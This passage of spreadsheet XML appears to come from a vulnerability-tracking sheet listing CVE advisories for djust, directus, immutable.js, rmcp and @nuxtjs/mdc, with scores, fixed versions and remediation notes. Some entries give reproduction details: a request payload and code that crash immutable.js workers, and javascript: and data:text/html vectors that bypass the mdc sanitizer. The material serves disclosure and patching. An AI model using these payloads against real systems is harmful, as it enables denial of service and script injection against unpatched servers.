        </is>
      </c>
      <c r="S3" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61594</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B4" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C4" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61599</t>
        </is>
      </c>
      <c r="D4" s="5" t="n">
        <v>8.800000000000001</v>
      </c>
      <c r="E4" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F4" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G4" s="5" t="inlineStr"/>
      <c r="H4" s="5" t="inlineStr"/>
      <c r="I4" s="5" t="inlineStr"/>
      <c r="J4" s="5" t="inlineStr"/>
      <c r="K4" s="5" t="inlineStr"/>
      <c r="L4" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M4" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N4" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O4" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P4" s="5" t="inlineStr"/>
      <c r="Q4" s="5" t="inlineStr">
        <is>
          <t>CWE-470</t>
        </is>
      </c>
      <c r="R4" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the djust live transport resolves the LiveView to mount from a client-supplied dotted path by calling `__import__(module_path, ...)`. The module is imported — running its top-level code (import side effects) — before the framework checks that the resolved object is a `LiveView` subclass and before any per-view authentication. The `LIVEVIEW_ALLOWED_MODULES` allowlist that should contain this is fail-open (`if allowed_modules:` — skipped when the setting is unset, the framework default) and uses loose `startswith` matching. An unauthenticated WebSocket client (the WS handshake does not require auth; per-view auth runs only after import + instantiate) can therefore send a `mount` / `live_redirect_mount` / `url_change` frame (or an SSE mount) with `view = "&lt;any.importable.module&gt;.AnyName"` and cause the server to import — and execute the top-level code of — any importable Python module by name. Version 1.0.7 fixes the issue with a fail-closed resolution gate (`djust._view_resolution.is_view_import_allowed`): a client view path resolves only if (a) its module is already loaded (`sys.modules` — so resolving runs no new code; URL-routed views loaded by URLconf at startup keep working with zero config) or (b) it matches `LIVEVIEW_ALLOWED_MODULES` on a module-segment boundary (explicit opt-in for lazily-imported views). The gate runs before `__import__` at all three sinks (+ defense-in-depth inside `_instantiate_view`). As a workaround, set `LIVEVIEW_ALLOWED_MODULES` to the narrow list of modules that contain your mountable LiveView classes. (Note: pre-patch the allowlist is `startswith`-matched and the import still precedes the subclass check, so this is mitigation, not a complete fix.)</t>
        </is>
      </c>
      <c r="S4" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61599</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B5" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C5" s="5" t="inlineStr">
        <is>
          <t>CVE-2024-39896</t>
        </is>
      </c>
      <c r="D5" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E5" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F5" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G5" s="5" t="inlineStr"/>
      <c r="H5" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I5" s="5" t="inlineStr"/>
      <c r="J5" s="5" t="inlineStr"/>
      <c r="K5" s="5" t="inlineStr"/>
      <c r="L5" s="5" t="inlineStr">
        <is>
          <t>npm:directus</t>
        </is>
      </c>
      <c r="M5" s="5" t="inlineStr">
        <is>
          <t>10.13.0</t>
        </is>
      </c>
      <c r="N5" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O5" s="5" t="inlineStr"/>
      <c r="P5" s="5" t="inlineStr"/>
      <c r="Q5" s="5" t="inlineStr">
        <is>
          <t>CWE-200</t>
        </is>
      </c>
      <c r="R5" s="5" t="inlineStr">
        <is>
          <t xml:space="preserve">### Impact
When relying on SSO providers in combination with local authentication it can be possible to enumerate existing SSO users in the instance. This is possible because if an email address exists in Directus and belongs to a known SSO provider then it will throw a "helpful" error that the user belongs to another provider.
### Reproduction
1. Create a user using a SSO provider `test@directus.io`.
2. Try to log-in using the regular login form (or the API)
3. When using a valid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/1da3301d-226f-46a7-bfb8-3f6fb9bc55cd) | ![image](https://github.com/directus/directus/assets/9389634/50cab310-7d1c-4241-a6be-d06542565767) |
4. When using an invalid email address
| **APP** | **API** |
| --- | --- |
| ![image](https://github.com/directus/directus/assets/9389634/7b97659e-b49c-410b-872e-e36786b6e41e) | ![image](https://github.com/directus/directus/assets/9389634/d26ccba7-bb27-437e-991e-99c10941bbe7) |
5. Using this differing error it is possible to determine whether a specific email address is present in the Directus instance as an SSO user.
### Workarounds
When only using SSO for authentication then you can work around this issue by disabling local login using the following environment variable `AUTH_DISABLE_DEFAULT="true"`
### References
Implemented as feature in https://github.com/directus/directus/pull/13184
https://owasp.org/www-project-web-security-testing-guide/v42/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account
</t>
        </is>
      </c>
      <c r="S5" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2024-39896</t>
        </is>
      </c>
    </row>
    <row r="6">
      <c r="A6" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B6" s="5" t="inlineStr">
        <is>
          <t>Updated</t>
        </is>
      </c>
      <c r="C6" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-59879</t>
        </is>
      </c>
      <c r="D6" s="5" t="n">
        <v>8.699999999999999</v>
      </c>
      <c r="E6" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="G6" s="5" t="inlineStr"/>
      <c r="H6" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I6" s="5" t="inlineStr"/>
      <c r="J6" s="5" t="inlineStr"/>
      <c r="K6" s="5" t="inlineStr"/>
      <c r="L6" s="5" t="inlineStr">
        <is>
          <t>npm:immutable</t>
        </is>
      </c>
      <c r="M6" s="5" t="inlineStr">
        <is>
          <t>3.8.4, 4.3.9, 5.1.8</t>
        </is>
      </c>
      <c r="N6" s="5" t="inlineStr">
        <is>
          <t>GHSA</t>
        </is>
      </c>
      <c r="O6" s="5" t="inlineStr"/>
      <c r="P6" s="5" t="inlineStr"/>
      <c r="Q6" s="5" t="inlineStr">
        <is>
          <t>CWE-190, CWE-400, CWE-835, CWE-1284</t>
        </is>
      </c>
      <c r="R6" s="5" t="inlineStr">
        <is>
          <t>## Summary
`List#set`, `List#setSize`, `List#setIn`, `List#updateIn` (and the functional `set` / `setIn` / `updateIn`) mishandle an index or size in the range `[2 ** 30, 2 ** 31)`:
- On an **empty** `List` the operation enters an **uncatchable infinite loop** (a tight CPU spin; a surrounding `try/catch` never regains control). Only killing the worker recovers it.
- On a **populated** `List` (≥ 32 elements — i.e. any array of ≥ 32 items turned into a `List` by `fromJS`) the loop allocates without bound → heap exhaustion → the **process aborts** (`SIGABRT`, exit `134`, or kernel OOM-kill `137`). A real crash, not a recoverable error.
The index may be a **numeric string**, so it can come straight from a request body, URL, or key-path. A single small unauthenticated request is enough.
There is also a companion **silent data-corruption** issue in `setSize`:
```js
List([1, 2, 3]).setSize(2 ** 31); // before fix =&gt; size 0  (silently cleared)
List([1, 2, 3]).setSize(2 ** 32 + 5); // before fix =&gt; size 5  (huge value wraps to 5)
```
## Impact
Availability only. A reachable configuration is any endpoint that routes untrusted input into a `List` index or a `setIn`/`updateIn` key-path — which the extremely common `state = fromJS(body); state.setIn(userPath, value)` pattern does (config stores, document/collection editors, redux-immutable reducers, JSON-Patch endpoints, etc.).
No confidentiality or integrity impact, no RCE. The companion `setSize` bug can silently corrupt application state (wrong size) without crashing.
## Reproduction (immutable 5.1.7)
```ts
import { fromJS, List } from 'immutable';
// 1) Populated List: OOM -&gt; process abort (SIGABRT, exit 134) within ~2s
fromJS({ items: new Array(64).fill(0) }).setIn(['items', '1073741824'], 'x');
// 2) Empty List: hangs forever, uncatchable
List().set(2 ** 30, 'x');
// 3) Silent truncation
List([1, 2, 3]).setSize(2 ** 31); // =&gt; size 0
List([1, 2, 3]).setSize(2 ** 32 + 5); // =&gt; size 5
```
A remote 43-byte HTTP request (`{"path":["items","1073741824"],"value":"x"}`) is sufficient to abort a worker that applies it via `state = state.setIn(path, value)`.
Any index in `[2 ** 30, 2 ** 31)` works (`1073741824`, `2000000000`, …). An index in `[2 ** 31, 2 ** 32)` does not crash — it silently wraps (clearing the List) via the same root cause.
## Root cause
`List` stores its values in a 32-wide trie (`SHIFT = 5`, so each level addresses 5 more bits) and uses **signed 32-bit bitwise arithmetic** throughout `setListBounds()` (`src/List.js`):
1. **Infinite loop (the hang / OOM).** The level-raising loop
```js
while (newTailOffset &gt;= 1 &lt;&lt; (newLevel + SHIFT)) {
  newRoot = new VNode(
    newRoot &amp;&amp; newRoot.array.length ? [newRoot] : [],
    owner
  );
  newLevel += SHIFT;
}
```
relies on `1 &lt;&lt; (newLevel + SHIFT)`. A JavaScript shift count is taken **mod 32**, so once `newLevel + SHIFT` reaches `31` the term goes **negative** (`1 &lt;&lt; 31 === -2147483648`) and at `32` wraps to `1` (`1 &lt;&lt; 35 === 8`). The comparison then stays `true` forever and the loop never terminates. On a populated `List`, each iteration retains a new `VNode` (`[newRoot]`), so the heap fills and V8 aborts; on an empty `List` it spins on CPU without allocating.
2. **Silent wraparound (the `setSize` corruption).** The `begin |= 0` / `end |= 0` coercion (`ToInt32`) silently wraps large finite values (`(2 ** 31) | 0 === -2147483648`, `(2 ** 32 + 5) | 0 === 5`), producing a wrong resulting size instead of an error.
The threshold is `2 ** 30`: that is the largest size for which `1 &lt;&lt; (newLevel + SHIFT)` stays a valid positive 32-bit integer throughout the loops (`newLevel + SHIFT` stays ≤ 30).
## Remediation
The fix is contained to `setListBounds()` in `src/List.js`:
1. **Validate up front, before the lossy `| 0` coercion.** Compute the intended origin and capacity in full precision and throw a clear, catchable `RangeError` when they exceed the addressable range (`MAX_LIST_SIZE = 2 ** 30`). `Infinity`/`NaN` are left to the existing `| 0 → 0` behaviour (so `setSize(Infinity)` stays `0` and `slice(0, Infinity)` still means "to the end").
2. **Stop the shift from wrapping.** Replace `1 &lt;&lt; exp` in the level-raising loops with a helper that uses the cheap bitwise shift while it is exact (`exp ≤ 30`, the common path including every `push`/`setSize`/`slice`) and falls back to the non-wrapping `2 ** exp` only for the rare deep trees reached when a negative origin (`unshift` / negative index) is normalized to a large positive capacity (`exp` can reach 35 there, where `1 &lt;&lt; 35` would wrap to 8).
This turns every hang, the misleading `"Maximum call stack size exceeded"`, the OOM/`SIGABRT`, and the silent `setSize` truncation into one descriptive `RangeError`, preserves all behaviour for sizes `&lt; 2 ** 30`, and keeps the hot `push` path on the fast bitwise shift (the `2 ** exp` branch is never reached by non-negative operations).
### Is the new limit a breaking change?
No working code is affected. A `List` could never actually hold `≥ 2 ** 30` values before — the attempt hung, crashed, or silently corrupted the size. The limit was already implicit in the 32-bit trie; the fix only makes it explicit and catchable, mirroring native JS arrays (`new Array(2 ** 32)` → `RangeError: Invalid array length`). The single observable behaviour change is that `setSize(hugeValue)`, which used to return a silently wrong size, now throws. `2 ** 30` ≈ 1.07 billion entries (~8 GB of pointers alone), far beyond any practical use.
## Mitigations (for users who cannot upgrade immediately)
- Validate/clamp any externally supplied `List` index or `setIn`/`updateIn` key-path segment against a sane maximum before passing it to immutable.
- Reject numeric path segments `≥ 2 ** 30`.
- Run request handling in a worker that can be restarted, and cap the heap (`--max-old-space-size`) so an abort is contained.</t>
        </is>
      </c>
      <c r="S6" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-59879</t>
        </is>
      </c>
    </row>
    <row r="7">
      <c r="A7" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B7" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C7" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63127</t>
        </is>
      </c>
      <c r="D7" s="5" t="n">
        <v>8.199999999999999</v>
      </c>
      <c r="E7" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F7" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G7" s="5" t="inlineStr"/>
      <c r="H7" s="5" t="inlineStr"/>
      <c r="I7" s="5" t="inlineStr"/>
      <c r="J7" s="5" t="inlineStr"/>
      <c r="K7" s="5" t="inlineStr"/>
      <c r="L7" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M7" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N7" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O7" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P7" s="5" t="inlineStr"/>
      <c r="Q7" s="5" t="inlineStr">
        <is>
          <t>CWE-345</t>
        </is>
      </c>
      <c r="R7" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's OAuth implementation in crates/rmcp/src/transport/auth.rs omits the RFC 9728 resource field from ResourceServerMetadata and allows discover_oauth_server_via_resource_metadata to use protected-resource metadata without confirming that the returned resource identifier exactly matches the configured MCP server. A malicious MCP server can publish metadata for a different legitimate MCP resource and its authorization server, causing a victim who connects and completes the authorization flow to obtain a legitimate access token that the client subsequently sends to the malicious server. The attacker can capture the token and impersonate the victim against the legitimate MCP resource within the token's granted scopes. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S7" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63127</t>
        </is>
      </c>
    </row>
    <row r="8">
      <c r="A8" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B8" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C8" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61591</t>
        </is>
      </c>
      <c r="D8" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E8" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F8" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G8" s="5" t="inlineStr"/>
      <c r="H8" s="5" t="inlineStr"/>
      <c r="I8" s="5" t="inlineStr"/>
      <c r="J8" s="5" t="inlineStr"/>
      <c r="K8" s="5" t="inlineStr"/>
      <c r="L8" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M8" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N8" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O8" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P8" s="5" t="inlineStr"/>
      <c r="Q8" s="5" t="inlineStr">
        <is>
          <t>CWE-345, CWE-915</t>
        </is>
      </c>
      <c r="R8" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, for views that opt into state snapshots, the snapshot `state_json` embedded in the client page was restored on reconnect as trusted view state with no integrity check. A client could edit the unsigned `state_json` in their page and return it in the reconnect mount frame to inject arbitrary view attributes — e.g. flip `is_admin` to `True`, or change `account_id` / `balance` — escalating privilege or tampering with business state held in public view attributes (the normal djust pattern). This issue is fixed in djust 1.0.7. State snapshots are signed; unsigned or forged snapshots are rejected on the back-navigation restore path. As a workaround, do not enable state snapshots; do not hold authorization/ownership state in public view attributes.</t>
        </is>
      </c>
      <c r="S8" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61591</t>
        </is>
      </c>
    </row>
    <row r="9">
      <c r="A9" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B9" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C9" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61593</t>
        </is>
      </c>
      <c r="D9" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E9" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F9" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G9" s="5" t="inlineStr"/>
      <c r="H9" s="5" t="inlineStr"/>
      <c r="I9" s="5" t="inlineStr"/>
      <c r="J9" s="5" t="inlineStr"/>
      <c r="K9" s="5" t="inlineStr"/>
      <c r="L9" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M9" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N9" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O9" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P9" s="5" t="inlineStr"/>
      <c r="Q9" s="5" t="inlineStr">
        <is>
          <t>CWE-352</t>
        </is>
      </c>
      <c r="R9" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, the SSE client→server POST endpoints are `@csrf_exempt` and the SSE GET stream endpoint had no Origin check, so a cross-origin page could drive a victim-cookie-authenticated SSE session: force the victim's browser to GET the stream URL (which creates and mounts a LiveView as the victim) and POST to the message endpoint with `credentials: include` to fire state-changing event handlers as the victim. The URL `session_id` is client-chosen (validated only for UUID *format*), so it is not a CSRF token, and a JSON body sent as `text/plain` is a CORS simple request with no preflight. The issue is fixed in 1.0.7. All three SSE endpoints validate the request `Origin` against `ALLOWED_HOSTS` (mirroring the WebSocket CSWSH defense) and reject cross-origin requests with 403; the POST endpoints additionally require `Content-Type: application/json` (415 otherwise), closing the `text/plain` simple-request bypass. As a workaround, disable the SSE transport, or front it with a proxy that enforces an Origin allowlist.</t>
        </is>
      </c>
      <c r="S9" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61593</t>
        </is>
      </c>
    </row>
    <row r="10">
      <c r="A10" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B10" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C10" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63671</t>
        </is>
      </c>
      <c r="D10" s="5" t="n">
        <v>8.1</v>
      </c>
      <c r="E10" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F10" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G10" s="5" t="inlineStr"/>
      <c r="H10" s="5" t="inlineStr"/>
      <c r="I10" s="5" t="inlineStr"/>
      <c r="J10" s="5" t="inlineStr"/>
      <c r="K10" s="5" t="inlineStr"/>
      <c r="L10" s="5" t="inlineStr">
        <is>
          <t>npm:@nuxtjs/mdc</t>
        </is>
      </c>
      <c r="M10" s="5" t="inlineStr">
        <is>
          <t>0.22.1</t>
        </is>
      </c>
      <c r="N10" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O10" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P10" s="5" t="inlineStr"/>
      <c r="Q10" s="5" t="inlineStr">
        <is>
          <t>CWE-184, CWE-79</t>
        </is>
      </c>
      <c r="R10" s="5" t="inlineStr">
        <is>
          <t>MDC is a tool to take regular Markdown and write documents interacting deeply with a Vue component. Prior to 0.22.1, @nuxtjs/mdc uses parseMarkdown with allowDangerousHtml enabled by default and relies on validateProps, validateProp, and unsafeLinkPrefix to remove executable URLs from untrusted Markdown. validateProp checks only attributes named href or src, allowing an SVG xlink:href value represented as xLinkHref to retain a javascript: URL that executes in the page origin when selected. The data:text/html denylist entries are also compared against url.protocol, which is only data:, so an iframe src containing data:text/html survives sanitization and executes in an opaque origin when loaded. Plain href javascript: URLs, srcdoc, object, script, and base elements are already blocked, making these two paths specific sibling gaps in the sanitizer. This issue is fixed in version 0.22.1.</t>
        </is>
      </c>
      <c r="S10" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63671</t>
        </is>
      </c>
    </row>
    <row r="11">
      <c r="A11" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B11" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C11" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61595</t>
        </is>
      </c>
      <c r="D11" s="5" t="n">
        <v>7.7</v>
      </c>
      <c r="E11" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F11" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G11" s="5" t="inlineStr"/>
      <c r="H11" s="5" t="inlineStr"/>
      <c r="I11" s="5" t="inlineStr"/>
      <c r="J11" s="5" t="inlineStr"/>
      <c r="K11" s="5" t="inlineStr"/>
      <c r="L11" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M11" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N11" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O11" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P11" s="5" t="inlineStr"/>
      <c r="Q11" s="5" t="inlineStr">
        <is>
          <t>CWE-636, CWE-862</t>
        </is>
      </c>
      <c r="R11" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, `djust.tenants` isolation was enforced only on the HTTP path. The current tenant was stored in `threading.local()` and set exclusively by the HTTP-only `TenantMiddleware`, so on the live (WebSocket/SSE) path `get_current_tenant()` was always `None` during mount and every event handler — and the tenant-aware `QuerySet` manager failed OPEN (returned the unfiltered queryset, ignoring `STRICT_MODE`), disclosing every tenant's rows to whoever held the socket. `threading.local` was additionally shared across connections on the `sync_to_async` executor thread. This issue is fixed in djust 1.0.7. Tenant storage moved to a `contextvars.ContextVar` (per async task); the resolved tenant is bound around WS/SSE mount and every dispatch; both managers scope the base queryset once and fail CLOSED (`.none()` under the default `STRICT_MODE`); and system check S006 warns when `STRICT_MODE=False`. No known workarounds are available on the live path.</t>
        </is>
      </c>
      <c r="S11" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61595</t>
        </is>
      </c>
    </row>
    <row r="12">
      <c r="A12" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B12" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C12" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63128</t>
        </is>
      </c>
      <c r="D12" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="E12" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F12" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G12" s="5" t="inlineStr"/>
      <c r="H12" s="5" t="inlineStr"/>
      <c r="I12" s="5" t="inlineStr"/>
      <c r="J12" s="5" t="inlineStr"/>
      <c r="K12" s="5" t="inlineStr"/>
      <c r="L12" s="5" t="inlineStr">
        <is>
          <t>rust:rmcp</t>
        </is>
      </c>
      <c r="M12" s="5" t="inlineStr">
        <is>
          <t>2.0.0</t>
        </is>
      </c>
      <c r="N12" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD</t>
        </is>
      </c>
      <c r="O12" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P12" s="5" t="inlineStr"/>
      <c r="Q12" s="5" t="inlineStr">
        <is>
          <t>CWE-400, CWE-401, CWE-772</t>
        </is>
      </c>
      <c r="R12" s="5" t="inlineStr">
        <is>
          <t>RMCP is an official Rust SDK for the Model Context Protocol. Prior to 2.0.0, the rmcp crate's stateful Streamable HTTP server in crates/rmcp/src/transport/streamable_http_server/tower.rs allows an unauthenticated client to send a well-formed JSON-RPC POST that is not an initialization request, or an initialization request with a mismatched protocol header, causing StreamableHttpService::handle_post to call LocalSessionManager.create_session before validating the message. An early validation failure returns without removing the inserted LocalSessionHandle from LocalSessionManager.sessions, permanently retaining session and channel state for the server process lifetime. Repeated requests can grow the shared session table without bound, degrade legitimate-client latency through lock contention, exhaust memory, and terminate the server. This issue is fixed in version 2.0.0.</t>
        </is>
      </c>
      <c r="S12" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63128</t>
        </is>
      </c>
    </row>
    <row r="13">
      <c r="A13" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B13" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C13" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61590</t>
        </is>
      </c>
      <c r="D13" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E13" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F13" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G13" s="5" t="inlineStr"/>
      <c r="H13" s="5" t="inlineStr"/>
      <c r="I13" s="5" t="inlineStr"/>
      <c r="J13" s="5" t="inlineStr"/>
      <c r="K13" s="5" t="inlineStr"/>
      <c r="L13" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M13" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N13" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O13" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P13" s="5" t="inlineStr"/>
      <c r="Q13" s="5" t="inlineStr">
        <is>
          <t>CWE-306, CWE-668</t>
        </is>
      </c>
      <c r="R13" s="5" t="inlineStr">
        <is>
          <t>djust provides Phoenix LiveView-style reactive server-side rendering for Django with Rust-powered performance. Prior to version 1.0.7, djust's observability endpoints expose live view/session state and a remote method-invocation surface (`eval_handler`). The localhost restriction was an opt-in middleware that the documented setup omits; the views themselves enforced only `DEBUG`. In the misconfigured-but-documented scenario (DEBUG on, middleware not installed) a non-localhost client could read live application state and invoke handlers remotely. This issue is fixed in djust 1.0.7. The localhost restriction is enforced in-view on every observability endpoint (no longer dependent on a separately-installed middleware), and `eval_handler` is restricted; gated requests receive a non-disclosing response. As a workaround, ensure `DEBUG=False` in production, and do not expose the observability endpoints to untrusted networks.</t>
        </is>
      </c>
      <c r="S13" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-61590</t>
        </is>
      </c>
    </row>
    <row r="14">
      <c r="A14" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B14" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C14" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-61592</t>
        </is>
      </c>
      <c r="D14" s="5" t="n">
        <v>7.4</v>
      </c>
      <c r="E14" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F14" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G14" s="5" t="inlineStr"/>
      <c r="H14" s="5" t="inlineStr"/>
      <c r="I14" s="5" t="inlineStr"/>
      <c r="J14" s="5" t="inlineStr"/>
      <c r="K14" s="5" t="inlineStr"/>
      <c r="L14" s="5" t="inlineStr">
        <is>
          <t>pip:djust</t>
        </is>
      </c>
      <c r="M14" s="5" t="inlineStr">
        <is>
          <t>1.0.7</t>
        </is>
      </c>
      <c r="N14" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O14" s="5" t="inlineStr">
        <is>
          <t>2026-09-16</t>
        </is>
      </c>
      <c r="P14" s="5" t="inlineStr"/>
      <c r="Q14" s="5" t="inlineStr">
        <is>
          <t>CWE-384, CWE-639, CWE-862</t>
        </is>
      </c>
